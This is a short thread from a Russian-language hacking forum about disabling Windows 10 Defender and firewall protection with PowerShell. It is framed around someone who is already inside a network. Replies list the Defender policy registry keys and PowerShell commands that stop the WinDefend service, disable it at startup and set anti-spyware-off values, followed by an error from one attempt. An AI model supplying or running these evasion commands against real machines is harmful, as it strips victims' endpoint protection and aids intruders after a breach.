• XSS.stack #1 – первый литературный журнал от юзеров форума

How to disable firewall win 10 (powershell)

Пожалуйста, обратите внимание, что пользователь заблокирован
PoC script, no pochemy to nerabotaet, Win 10 eng

No esli tu yge vnytri seti v chem vobshe problema

(zavtra nachny pisat po rysski, klavy pokrashy, bykvy flamasterom narisyu)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender > This is the path of Defender
And DWORD values:

DisableAntiSpyware set to 1

ServiceKeepAlive set to 0

Код:
Stop-Service WinDefend

Set-Service WinDefend -StartupType Disabled

Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1

Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableRoutinelyTakingAction" -Value 1

Also check this and apply your code:
 
Stop-Service WinDefend Set-Service WinDefend -StartupType Disabled Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableRoutinelyTakingAction" -Value 1
Stop-Service : Service 'Windows Defender Antivirus Service (WinDefend)' cannot be stopped due to the following error:
Cannot open WinDefend service on computer '.'.
 
Пожалуйста, обратите внимание, что пользователь заблокирован


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх